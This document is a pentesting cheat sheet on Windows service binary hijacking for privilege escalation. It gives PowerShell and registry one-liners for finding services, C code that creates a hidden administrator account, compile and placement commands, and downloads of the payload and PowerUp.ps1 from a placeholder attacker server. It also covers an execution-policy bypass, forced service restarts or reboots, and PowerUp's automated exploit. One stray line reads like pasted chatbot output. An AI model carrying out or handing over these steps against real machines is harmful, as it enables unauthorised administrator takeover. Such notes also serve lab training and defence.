Service Binary Hijacking

This attack involves replacing the service binary with a malicious version and restart the service.

Enumerate Services

PowerShell cmdlet

Using Get-CimInstance with PowerShell to list running services and filter built in services:

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running' -and $_.PathName -notlike "C:\Windows\system32*"}

When running Get-CimInstance and Get-Service via WinRM or a bind shell will result in a "Access denied" error when querying for services with a non-administrative user. Using an interactive logon such as RDP solves this problem.

Registry

The following one-liner command was taken from evil-winrm source code and uses the registry to enumerate services.

Note: this is very useful when using low privileged user.

$servicios = Get-ItemProperty "registry::HKLM\System\CurrentControlSet\Services\*" | Where-Object {$_.imagepath -notmatch "system" -and $_.imagepath -ne $null } | Select-Object pschildname,imagepath  ; foreach ($servicio in $servicios  ) {Get-Service $servicio.PSChildName -ErrorAction SilentlyContinue | Out-Null ; if ($? -eq $true) {$privs = $true} else {$privs = $false} ; $Servicios_object = New-Object psobject -Property @{"Service" = $servicio.pschildname ; "Path" = $servicio.imagepath ; "Privileges" = $privs} ;  $Servicios_object
}

Enumerate Binary Permissions

Verifying the permission to modify the binary:

icacls "<binary_path>"

The table below describes the permissions definitions icacls results:

Mask	Permissions
F	Full access
M	Modify access
RX	Read and execute access
R	Read-only access
W	Write-only access

Creating The Malicious Binary

The C code you provided appears to add a new user <user> with the password password123! to the system and elevate it to administrator:

#include <stdlib.h>

int main ()
{
  int i;
  
  i = system ("net user <user> password123! /add");
  i = system ("net localgroup administrators <user> /add");
  
  return 0;
}

Compiling this C code to create an executable:

x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

Moving the legitimate service's binary, in order to be able to replace with the malicious one:

move <binary_path> <somepath>

Transferring the executable from the attacker machine:

iwr -uri http://<attacker_http_server>/adduser.exe -Outfile <binary_path>

Triggering the Execution

In order to trigger the malicious binary execution it's needed to either restart the service manually or If the service is set to start automatically, it possible to reboot the machine to force the service to start. Once the service restarts, the malicious binary will be executed.

Checking the Service Permissions:

sc sdshow <service_name>

Manual restart

Trying to restart the service:

Batch

net stop <service_name>
net start <service_name>

PowerShell

Automatic restart

If restarting the service is not allowed, trying the another method as described above:

1. Checking if the service set to restart automatically:

sc query <service_name>

Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like '<service_name>'}

1. Checking if the current user (foothold) has the SeShutdownPrivilege permission which allows to reboot the machine

whoami /priv

1. Rebooting the machine

/r - Reboot instead of shutdown.

/t 0 - Trigger in 0 seconds.

shutdown /r /t 0

Automated Process

It is possible to automate the process using well known tool called PowerUp from PowerSploit Collection:

PowerSploit/Privesc/PowerUp.ps1 at master · PowerShellMafia/PowerSploitGitHub

Downloading PowerUp.ps1:

iwr -uri http://<attacker_http_server>/PowerUp.ps1 -Outfile PowerUp.ps1

Bypassing Execution Policy:

powershell -ep bypass

Importing PowerUp.ps1:

. .\PowerUp.ps1

Finding Modifiable Services using Get-ModifiableServiceFile is a PowerUp function that looks for services on the machine whose executables are modifiable by the current user.

Get-ModifiableServiceFile

Exploiting:

Install-ServiceBinary -Name '<service_name>'

References

Sc.exe queryMicrosoftLearn

Sc.exe query